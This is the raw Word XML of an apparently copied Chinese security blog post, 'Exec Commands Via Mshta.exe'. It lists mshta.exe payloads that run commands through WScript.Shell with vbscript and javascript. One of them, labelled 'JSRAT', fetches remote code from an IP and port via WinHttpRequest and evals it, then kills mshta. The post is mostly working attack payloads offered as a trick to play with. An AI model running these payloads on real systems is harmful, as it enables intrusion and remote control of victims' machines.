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4726B" w:rsidRDefault="002E3C72"/>
    <w:p w:rsidR="002E3C72" w:rsidRDefault="002E3C72"/>
    <w:p w:rsidR="002E3C72" w:rsidRPr="002E3C72" w:rsidRDefault="002E3C72" w:rsidP="002E3C72">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:before="300" w:after="225"/>
        <w:jc w:val="center"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Microsoft YaHei" w:eastAsia="Microsoft YaHei" w:hAnsi="Microsoft YaHei" w:cs="新細明體"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="39"/>
          <w:szCs w:val="39"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:r w:rsidRPr="002E3C72">
        <w:rPr>
          <w:rFonts w:ascii="Microsoft YaHei" w:eastAsia="Microsoft YaHei" w:hAnsi="Microsoft YaHei" w:cs="新細明體" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="39"/>
          <w:szCs w:val="39"/>
        </w:rPr>
        <w:t>Exec Commands Via Mshta.exe</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="0"/>
    <w:p w:rsidR="002E3C72" w:rsidRPr="002E3C72" w:rsidRDefault="002E3C72" w:rsidP="002E3C72">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Microsoft YaHei" w:eastAsia="Microsoft YaHei" w:hAnsi="Microsoft YaHei" w:cs="新細明體" w:hint="eastAsia"/>
          <w:color w:val="999999"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002E3C72">
        <w:rPr>
          <w:rFonts w:ascii="Microsoft YaHei" w:eastAsia="Microsoft YaHei" w:hAnsi="Microsoft YaHei" w:cs="新細明體" w:hint="eastAsia"/>
          <w:color w:val="999999"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t> 发表于 2016-06-24 |  分类于 </w:t>
      </w:r>
      <w:hyperlink r:id="rId4" w:history="1">
        <w:r w:rsidRPr="002E3C72">
          <w:rPr>
            <w:rFonts w:ascii="Microsoft YaHei" w:eastAsia="Microsoft YaHei" w:hAnsi="Microsoft YaHei" w:cs="新細明體" w:hint="eastAsia"/>
            <w:color w:val="555555"/>
            <w:kern w:val="0"/>
            <w:sz w:val="18"/>
            <w:szCs w:val="18"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>奇技淫巧</w:t>
        </w:r>
      </w:hyperlink>
    </w:p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 w:hint="eastAsia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看</w:t>
      </w:r>
      <w:hyperlink r:id="rId5" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="002E3C72">
          <w:rPr>
            <w:rFonts w:ascii="Microsoft YaHei" w:eastAsia="Microsoft YaHei" w:hAnsi="Microsoft YaHei" w:cs="新細明體" w:hint="eastAsia"/>
            <w:color w:val="555555"/>
            <w:kern w:val="0"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>用“世界上最好的编程语言”制作的敲诈者木马揭秘</w:t>
        </w:r>
      </w:hyperlink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的时候发现，攻击者使用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mshta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来执行命令，之前没怎么接触过，查了查资料也不是很多，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mshta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是用来执行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文件的，经过测试发现，其实没有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文件，也可以通过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mshta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来执行命令的，经过几次测试发现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mshta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不仅可以使用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vbscript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，而且可以使用</w:t>
      </w:r>
      <w:proofErr w:type="spell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javascript</w:t>
      </w:r>
      <w:proofErr w:type="spell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来执行命令，整理payload如下：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsid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VBSCRIPT EXEC</w:t>
      </w:r>
    </w:p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 w:hint="eastAsia"/>
          <w:color w:val="555555"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002E3C72">
        <w:rPr>
          <w:rFonts w:ascii="Microsoft YaHei" w:eastAsia="Microsoft YaHei" w:hAnsi="Microsoft YaHei" w:cs="新細明體"/>
          <w:color w:val="555555"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>mshta</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002E3C72">
        <w:rPr>
          <w:rFonts w:ascii="Microsoft YaHei" w:eastAsia="Microsoft YaHei" w:hAnsi="Microsoft YaHei" w:cs="新細明體"/>
          <w:color w:val="555555"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="002E3C72">
        <w:rPr>
          <w:rFonts w:ascii="Microsoft YaHei" w:eastAsia="Microsoft YaHei" w:hAnsi="Microsoft YaHei" w:cs="新細明體"/>
          <w:color w:val="555555"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>vbscript:CreateObject</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="002E3C72">
        <w:rPr>
          <w:rFonts w:ascii="Microsoft YaHei" w:eastAsia="Microsoft YaHei" w:hAnsi="Microsoft YaHei" w:cs="新細明體"/>
          <w:color w:val="555555"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>("Wscript.Shell").Run("calc.exe",0,true)(window.close)</w:t>
      </w:r>
    </w:p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JAVASCRIPT EXEC</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002E3C72" w:rsidRPr="002E3C72" w:rsidRDefault="002E3C72" w:rsidP="002E3C72">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Microsoft YaHei" w:eastAsia="Microsoft YaHei" w:hAnsi="Microsoft YaHei" w:cs="新細明體" w:hint="eastAsia"/>
          <w:color w:val="555555"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gram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复</w:t>
      </w:r>
      <w:proofErr w:type="gram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"/>
        <w:gridCol w:w="8258"/>
      </w:tblGrid>
      <w:tr w:rsidR="002E3C72" w:rsidRPr="002E3C72" w:rsidTr="002E3C7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3C72" w:rsidRPr="002E3C72" w:rsidRDefault="002E3C72" w:rsidP="002E3C72">
            <w:pPr>
              <w:widowControl/>
              <w:shd w:val="clear" w:color="auto" w:fill="1B1B1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細明體" w:hAnsi="Consolas" w:cs="細明體" w:hint="eastAsia"/>
                <w:color w:val="999999"/>
                <w:kern w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002E3C72">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="細明體" w:hAnsi="Consolas" w:cs="細明體"/>
                <w:color w:val="999999"/>
                <w:kern w:val="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3C72" w:rsidRPr="002E3C72" w:rsidRDefault="002E3C72" w:rsidP="002E3C72">
            <w:pPr>
              <w:widowControl/>
              <w:shd w:val="clear" w:color="auto" w:fill="2D2D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</w:pPr>
            <w:proofErr w:type="spellStart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mshta</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd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 xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart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javascript</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd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: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"\..\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mshtml,RunHTMLApplication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;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document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.write();h=</w:t>
            </w:r>
            <w:r w:rsidRPr="002E3C72">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="細明體" w:hAnsi="Consolas" w:cs="細明體"/>
                <w:color w:val="CC99CC"/>
                <w:kern w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>new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%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20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ActiveXObject(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"WScript.Shell"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).run(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"calc.exe"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0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true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);</w:t>
            </w:r>
            <w:r w:rsidRPr="002E3C72">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="細明體" w:hAnsi="Consolas" w:cs="細明體"/>
                <w:color w:val="CC99CC"/>
                <w:kern w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>try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{h.Send();b=h.ResponseText;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eval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(b);}</w:t>
            </w:r>
            <w:r w:rsidRPr="002E3C72">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="細明體" w:hAnsi="Consolas" w:cs="細明體"/>
                <w:color w:val="CC99CC"/>
                <w:kern w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>catch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(e){</w:t>
            </w:r>
            <w:r w:rsidRPr="002E3C72">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="細明體" w:hAnsi="Consolas" w:cs="細明體"/>
                <w:color w:val="CC99CC"/>
                <w:kern w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>new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%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20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ActiveXObject(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"WScript.Shell"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).Run(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"cmd /c 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taskkill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/f /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im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mshta.exe"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0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true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);}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsid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</w:p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JSRAT</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002E3C72" w:rsidRPr="002E3C72" w:rsidRDefault="002E3C72" w:rsidP="002E3C72">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Microsoft YaHei" w:eastAsia="Microsoft YaHei" w:hAnsi="Microsoft YaHei" w:cs="新細明體" w:hint="eastAsia"/>
          <w:color w:val="555555"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart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lastRenderedPageBreak/>
        <w:t>复</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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制</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="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"/>
        <w:gridCol w:w="8268"/>
      </w:tblGrid>
      <w:tr w:rsidR="002E3C72" w:rsidRPr="002E3C72" w:rsidTr="002E3C72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3C72" w:rsidRPr="002E3C72" w:rsidRDefault="002E3C72" w:rsidP="002E3C72">
            <w:pPr>
              <w:widowControl/>
              <w:shd w:val="clear" w:color="auto" w:fill="1B1B1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right"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="細明體" w:hAnsi="Consolas" w:cs="細明體" w:hint="eastAsia"/>
                <w:color w:val="999999"/>
                <w:kern w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002E3C72">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="細明體" w:hAnsi="Consolas" w:cs="細明體"/>
                <w:color w:val="999999"/>
                <w:kern w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>1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9F9F9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2E3C72" w:rsidRPr="002E3C72" w:rsidRDefault="002E3C72" w:rsidP="002E3C72">
            <w:pPr>
              <w:widowControl/>
              <w:shd w:val="clear" w:color="auto" w:fill="2D2D2D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</w:pPr>
            <w:proofErr w:type="spellStart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mshta</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd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 xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart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javascript</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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: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"\..\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mshtml,RunHTMLApplication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;document.write();h=new%20ActiveXObject(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"WinHttp.WinHttpRequest.5.1"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);h.Open(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</w:t>
            </w:r>
            <w:r w:rsidRPr="002E3C72">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="細明體" w:hAnsi="Consolas" w:cs="細明體"/>
                <w:color w:val="CC99CC"/>
                <w:kern w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>GET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"http://192.168.2.101:9998/connect"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,false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject(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"WScript.Shell"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).Run(</w:t>
            </w:r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"cmd /c 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taskkill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/f /</w:t>
            </w:r>
            <w:proofErr w:type="spellStart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>im</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="002E3C72">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="細明體" w:hAnsi="Consolas" w:cs="細明體"/>
                <w:color w:val="99CC99"/>
                <w:kern w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> mshta.exe"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</w:t>
            </w:r>
            <w:r w:rsidRPr="002E3C72">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="細明體" w:hAnsi="Consolas" w:cs="細明體"/>
                <w:color w:val="F99157"/>
                <w:kern w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
            <w:r w:rsidRPr="002E3C72">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="細明體" w:hAnsi="Consolas" w:cs="細明體"/>
                <w:color w:val="CCCCCC"/>
                <w:kern w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>,true);}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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Demo如下：</w:t>
      </w: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br/>
      </w:r>
      <w:r w:rsidRPr="002E3C72">
        <w:rPr>
          <w:rFonts w:ascii="Microsoft YaHei" w:eastAsia="Microsoft YaHei" w:hAnsi="Microsoft YaHei" w:cs="新細明體"/>
          <w:noProof/>
          <w:color w:val="555555"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="6057900" cy="3695700"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1" name="圖片 1" descr="请输入图片描述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请输入图片描述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C72" w:rsidRPr="002E3C72" w:rsidRDefault="002E3C72" w:rsidP="002E3C72">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="300"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Microsoft YaHei" w:eastAsia="Microsoft YaHei" w:hAnsi="Microsoft YaHei" w:cs="新細明體" w:hint="eastAsia"/>
          <w:color w:val="555555"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002E3C72">
        <w:rPr>
          <w:rFonts w:ascii="Microsoft YaHei" w:eastAsia="Microsoft YaHei" w:hAnsi="Microsoft YaHei" w:cs="新細明體" w:hint="eastAsia"/>
          <w:color w:val="555555"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>你猜猜还可以怎么玩儿？ 2333333.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002E3C72" w:rsidRPr="002E3C72" w:rsidRDefault="002E3C72" w:rsidP="002E3C72">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Microsoft YaHei" w:eastAsia="Microsoft YaHei" w:hAnsi="Microsoft YaHei" w:cs="新細明體" w:hint="eastAsia"/>
          <w:color w:val="CCCCCC"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002E3C72">
        <w:rPr>
          <w:rFonts w:ascii="Microsoft YaHei" w:eastAsia="Microsoft YaHei" w:hAnsi="Microsoft YaHei" w:cs="新細明體" w:hint="eastAsia"/>
          <w:color w:val="CCCCCC"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>------本文结束</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002E3C72" w:rsidRDefault="002E3C72">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="002E3C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C72"/>
    <w:rsid w:val="002E3C72"/>
    <w:rsid w:val="003661FE"/>
    <w:rsid w:val="0047747F"/>
    <w:rsid w:val="0074741E"/>
    <w:rsid w:val="008A5A1F"/>
    <w:rsid w:val="00C23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C4A6CC"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{9C64B6B1-8CB5-44E0-A8C8-9CF501D30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autoRedefine/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="0047747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28"/>
      <w:szCs w:val="52"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="2">
    <w:name w:val="heading 2"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="20"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="002E3C72"/>
    <w:pPr>
      <w:widowControl/>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr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47747F"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:b/>
      <w:bCs/>
      <w:kern w:val="52"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="52"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="20">
    <w:name w:val="標題 2 字元"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="2"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="002E3C72"/>
    <w:rPr>
      <w:rFonts w:ascii="新細明體" w:eastAsia="新細明體" w:hAnsi="新細明體" w:cs="新細明體"/>
      <w:b/>
      <w:bCs/>
      <w:kern w:val="0"/>
      <w:sz w:val="36"/>
      <w:szCs w:val="36"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="post-time">
    <w:name w:val="post-time"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="002E3C72"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="post-meta-item-icon">
    <w:name w:val="post-meta-item-icon"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="002E3C72"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="post-meta-item-text">
    <w:name w:val="post-meta-item-text"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="002E3C72"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="post-category">
    <w:name w:val="post-category"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="002E3C72"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="post-meta-divider">
    <w:name w:val="post-meta-divider"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="002E3C72"/>
  </w:style>
  <w:style w:type="character" w:styleId="a3">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="002E3C72"/>
    <w:rPr>
      <w:color w:val="0000FF"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Web">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="a"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="002E3C72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2E3C7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2E3C72"/>
    <w:rPr>
      <w:rFonts w:ascii="細明體" w:eastAsia="細明體" w:hAnsi="細明體" w:cs="細明體"/>
      <w:kern w:val="0"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="line">
    <w:name w:val="line"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="002E3C72"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="string">
    <w:name w:val="string"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="002E3C72"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="keyword">
    <w:name w:val="keyword"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="002E3C72"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="number">
    <w:name w:val="number"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="002E3C72"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="builtin">
    <w:name w:val="built_in"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="002E3C72"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="literal">
    <w:name w:val="literal"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="002E3C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2271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99928">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="15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85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9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4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04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evi1cg.github.io/usr/uploads/2016/06/mshta.gif" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://drops.wooyun.org/papers/17049" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://evi1cg.me/categories/%E5%A5%87%E6%8A%80%E6%B7%AB%E5%B7%A7/" TargetMode="Externa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168</Words>
  <Characters>964</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>8</Lines>
  <Paragraphs>2</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>1130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董國安</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>董國安</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-08-05T07:58:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-08-05T08:01:00Z</dcterms:modified>
</cp:coreProperties>
</file>